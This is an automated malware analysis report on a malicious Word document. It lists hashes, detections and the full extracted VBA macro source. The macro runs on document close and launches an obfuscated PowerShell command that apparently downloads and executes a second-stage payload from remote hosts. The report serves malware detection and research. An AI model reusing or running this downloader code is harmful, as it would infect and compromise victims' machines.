Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 125d92660260e198…

MALICIOUS

Office (OLE)

87.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: c8ed326cb3fdc56bfa6ddd406fd50dcb SHA-1: b594bca095b0cc8e263f0575df43a0c08a67439c SHA-256: 125d92660260e198746109a445595a377ac5d33733885464d8cbfee00213ca2c
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoClose event, which is designed to execute automatically when the document is closed. The script contains a call to cmd.exe with a heavily obfuscated command that appears to be an attempt to execute PowerShell. This indicates the document's primary purpose is to download and execute a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Downloader.00536d-6720548-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6720548-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(1) = LelmukUtfEjEgeQd & CStr("5723")
      Call IsError(VBA.Interaction.Shell(Trim(Join(Array(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR, WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU, keSNuZjeFEnUdEBXiDUHUqiJYBa, sULOsiREqAZuCoJEmlmAbiTEZehiz), "")), (12 - (6 * 2))))
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(1) = mlomfibywIzAPojIMu & CStr("4251")
    WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A …
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Const jUNoGeaxECUmRyqoPygiJUV = 0
    Sub AutoClose()
    On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8350 bytes
SHA-256: d6b3b0fb6c5d656d037f31e82915822f7703f0f4f8baedecef0f1f3083eb43c1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const jUNoGeaxECUmRyqoPygiJUV = 0
Sub AutoClose()
On Error Resume Next
Dim pumIAsiMIMIRaiERUdKoWEvIDiNiDU(2)
Dim pumIAsiMIMIRaiERUdKoWEvIDiNiDU_4(2)
If InStr(4, "FCABehIjUFigADeXULiZD", "pumIAsiMIMIRaiERUdKoWEvIDiNiDU") Then
  pumIAsiMIMIRaiERUdKoWEvIDiNiDU(0) = InStrRev("FCABehIjUFigADeXULiZD", "pumIAsiMIMIRaiERUdKoWEvIDiNiDU")
  IsError CVErr(8867)
End If
IsError CVErr(114)
If Len(Oct(8867)) > 4 Then
 pumIAsiMIMIRaiERUdKoWEvIDiNiDU(1) = Hex(11 ^ 4)
End If
pumIAsiMIMIRaiERUdKoWEvIDiNiDU_4(0) = Now
VarType IsNumeric(CInt("8867"))
pumIAsiMIMIRaiERUdKoWEvIDiNiDU_4(1) = FCABehIjUFigADeXULiZD & CStr("8867")
Dim MTuaAvvOHuRPUXFawadOxIfoJUlYrU(2)
Dim MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(2)
If InStr(2, "mlomfibywIzAPojIMu", "MTuaAvvOHuRPUXFawadOxIfoJUlYrU") Then
  MTuaAvvOHuRPUXFawadOxIfoJUlYrU(0) = InStrRev("mlomfibywIzAPojIMu", "MTuaAvvOHuRPUXFawadOxIfoJUlYrU")
  IsError CVErr(4251)
End If
IsError CVErr(112)
If Len(Oct(4251)) > 2 Then
 MTuaAvvOHuRPUXFawadOxIfoJUlYrU(1) = Hex(11 ^ 2)
End If
MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(0) = Now
VarType IsNumeric(CInt("4251"))
MTuaAvvOHuRPUXFawadOxIfoJUlYrU_2(1) = mlomfibywIzAPojIMu & CStr("4251")
WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A^L^w^B^0^A^G^U^A^Z^Q^B^i^A^G^U^A^c^g^B^y^A^G^U^A^c^w^B^i^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^" + Chr(1 + 10 + (75) + 25) + "^A^" + Chr(2 + (35 * 2)) + "^A"

WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU = "^A^P^w^B^s^A^D^0^A^b^Q^B^1^A^G^w^A^d^A^B^v^A^D^Q^A^L^g^B^4^A^G^E^A^c^A^A^i^A^C^w^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^" + Chr(1 + 10 + (75) + 25) + "^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^g^A^C^s^A^I^A^A^n^A^F^w^A^M^g^A^2^A^D^I^A^M^Q^B^h^A^D^A^A^M^g^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^" + Chr(2 + (35 * 2)) + "^Q^A^Y^Q^B^y^A^" + Chr(2 + (35 * 2)) + "^Q^A^L^Q^B^Q^A^" + Chr(2 + (35 * 2)) + "^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^I^A^N^g^A^y^A^D^E^A^Y^Q^A^w^A^D^I^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^C"


Dim NukFyGYByZUnuQOlFytYPiqerIgEni(2)
Dim NukFyGYByZUnuQOlFytYPiqerIgEni_2(2)
If InStr(2, "PIDnIgUwOhET", "NukFyGYByZUnuQOlFytYPiqerIgEni") Then
  NukFyGYByZUnuQOlFytYPiqerIgEni(0) = InStrRev("PIDnIgUwOhET", "NukFyGYByZUnuQOlFytYPiqerIgEni")
  IsError CVErr(6466)
End If
IsError CVErr(132)
If Len(Oct(6466)) > 2 Then
 NukFyGYByZUnuQOlFytYPiqerIgEni(1) = Hex(13 ^ 2)
End If
NukFyGYByZUnuQOlFytYPiqerIgEni_2(0) = Now
VarType IsNumeric(CInt("6466"))
NukFyGYByZUnuQOlFytYPiqerIgEni_2(1) = PIDnIgUwOhET & CStr("6466")
keSNuZjeFEnUdEBXiDUHUqiJYBa = "^A^A^S^Q^B^F^A^F^g^A^K^A^A^" + Chr(1 + 10 + (75) + 25) + "^A^E^4^A^Z^Q^B^3^A^C^0^A^T^w^B^i^A^G^" + Chr(1 + 10 + (75) + 25) + "^A^Z^Q^B^j^A^" + Chr(2 + (35 * 2)) + "^Q^A^I^A^B^T^A^" + Chr(2 + (35 * 2)) + "^k^A^c^w^B^0^A^G^U^A^b^Q^A^u^A^E^4^A^Z^Q^B^0^A^C^4^A^V^w^B^l^A^G^I^A^Q^w^B^s^A^G^k^A^Z^Q^B^u^A^" + Chr(2 + (35 * 2)) + "^Q^A^K^Q^A^u^A^E^Q^A^b^w^B^3^A^G^4^A^b^A^B^v^A^G^E^A^Z^A^B^T^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^g^B^p^A^G^4^A^Z^w^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A^L^w^A^1^A^D^Q^A^L^g^A^z^A^D^k^A^L^g^A^3^A^D^Q^A^L^g^A^x^A^D^I^A^N^A^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^" + Chr(1 + 10 + (75) + 25) + "^A^" + Chr(2 + (35 * 2)) + "^A^A^I^g^A^p^A^C^k^A^O^w^A^g^A^E^U^A^e^A^B^p^A"

Dim XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB(2)
Dim XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB_4(2)
If InStr(4, "xylIsURUVYino", "XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB") Then
  XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB(0) = InStrRev("xylIsURUVYino", "XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB")
  IsError CVErr(9334)
End If
IsError CVErr(124)
If Len(Oct(9334)) > 4 Then
 XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB(1) = Hex(12 ^ 4)
End If
XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB_4(0) = Now
VarType IsNumeric(CInt("9334"))
XYWACEHAcAWorUSUWUxobpJaJYSaKUWoHedUB_4(1) = xylIsURUVYino & CStr("9334")

sULOsiREqAZuCoJEmlmAbiTEZehiz = "^" + Chr(2 + (35 * 2)) + "^Q^A"
Dim RAWuXIleFoWoviaiIdOrOxeWOnISoBc(2)
Dim RAWuXIleFoWoviaiIdOrOxeWOnISoBc_4(2)
If InStr(4, "FaxAPOVEiorusunI", "RAWuXIleFoWoviaiIdOrOxeWOnISoBc") Then
  RAWuXIleFoWoviaiIdOrOxeWOnISoBc(0) = InStrRev("FaxAPOVEiorusunI", "RAWuXIleFoWoviaiIdOrOxeWOnISoBc")
  IsError CVErr(1433)
End If
IsError CVErr(114)
If Len(Oct(1433)) > 4 Then
 RAWuXIleFoWoviaiIdOrOxeWOnISoBc(1) = Hex(11 ^ 4)
End If
RAWuXIleFoWoviaiIdOrOxeWOnISoBc_4(0) = Now
VarType IsNumeric(CInt("1433"))
RAWuXIleFoWoviaiIdOrOxeWOnISoBc_4(1) = FaxAPOVEiorusunI & CStr("1433")


Dim VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA(2)
Dim VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA_1(2)
If InStr(1, "JaRenAsEbaa", "VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA") Then
  VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA(0) = InStrRev("JaRenAsEbaa", "VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA")
  IsError CVErr(6435)
End If
IsError CVErr(111)
If Len(Oct(6435)) > 1 Then
 VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA(1) = Hex(11 ^ 1)
End If
VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA_1(0) = Now
VarType IsNumeric(CInt("6435"))
VOCIWIAxyiTIriQydETiFIkyTaSoPUsegA_1(1) = JaRenAsEbaa & CStr("6435")
Call labYTeaiTEPuDIDYXYqIJOfidUNSoDANyvydoWo(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR & "", WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU + CStr(""), keSNuZjeFEnUdEBXiDUHUqiJYBa, "dhdos28sjdkslsm", sULOsiREqAZuCoJEmlmAbiTEZehiz)
Dim vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA(2)
Dim vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA_6(2)
If InStr(6, "WoiebypOQeqU", "vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA") Then
  vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA(0) = InStrRev("WoiebypOQeqU", "vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA")
  IsError CVErr(3849)
End If
IsError CVErr(116)
If Len(Oct(3849)) > 6 Then
 vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA(1) = Hex(11 ^ 6)
End If
vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA_6(0) = Now
VarType IsNumeric(CInt("3849"))
vqyPwaCiinoKoHobApAGZIgoxeGoxYBiwA_6(1) = WoiebypOQeqU & CStr("3849")

End Sub
Sub labYTeaiTEPuDIDYXYqIJOfidUNSoDANyvydoWo(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR, WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU, keSNuZjeFEnUdEBXiDUHUqiJYBa, qOnucIVyQufjeLOJoMucIaAminyv, sULOsiREqAZuCoJEmlmAbiTEZehiz)
On Error Resume Next

  
Dim voNYpuXEjiEQERavOsIwYNQuvApANyVUiac(2)
Dim voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(2)
If InStr(5, "LelmukUtfEjEgeQd", "voNYpuXEjiEQERavOsIwYNQuvApANyVUiac") Then
  voNYpuXEjiEQERavOsIwYNQuvApANyVUiac(0) = InStrRev("LelmukUtfEjEgeQd", "voNYpuXEjiEQERavOsIwYNQuvApANyVUiac")
  IsError CVErr(5723)
End If
IsError CVErr(125)
If Len(Oct(5723)) > 5 Then
 voNYpuXEjiEQERavOsIwYNQuvApANyVUiac(1) = Hex(12 ^ 5)
End If
voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(0) = Now
VarType IsNumeric(CInt("5723"))
voNYpuXEjiEQERavOsIwYNQuvApANyVUiac_5(1) = LelmukUtfEjEgeQd & CStr("5723")
  Call IsError(VBA.Interaction.Shell(Trim(Join(Array(WyJodAMiKuDirelupejyzOlUBenuSubBAcUdESOhuDoR, WOKatOKEzaiwETEgUTYsoqejITexIHAroQEBU, keSNuZjeFEnUdEBXiDUHUqiJYBa, sULOsiREqAZuCoJEmlmAbiTEZehiz), "")), (12 - (6 * 2))))


Dim VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW(2)
Dim VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW_7(2)
If InStr(7, "JEDekYZeqiB", "VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW") Then
  VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW(0) = InStrRev("JEDekYZeqiB", "VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW")
  IsError CVErr(1233)
End If
IsError CVErr(127)
If Len(Oct(1233)) > 7 Then
 VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW(1) = Hex(12 ^ 7)
End If
VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW_7(0) = Now
VarType IsNumeric(CInt("1233"))
VACEaoHohaSeUpujOqiGytbAbEKARAKoHYveW_7(1) = JEDekYZeqiB & CStr("1233")

End Sub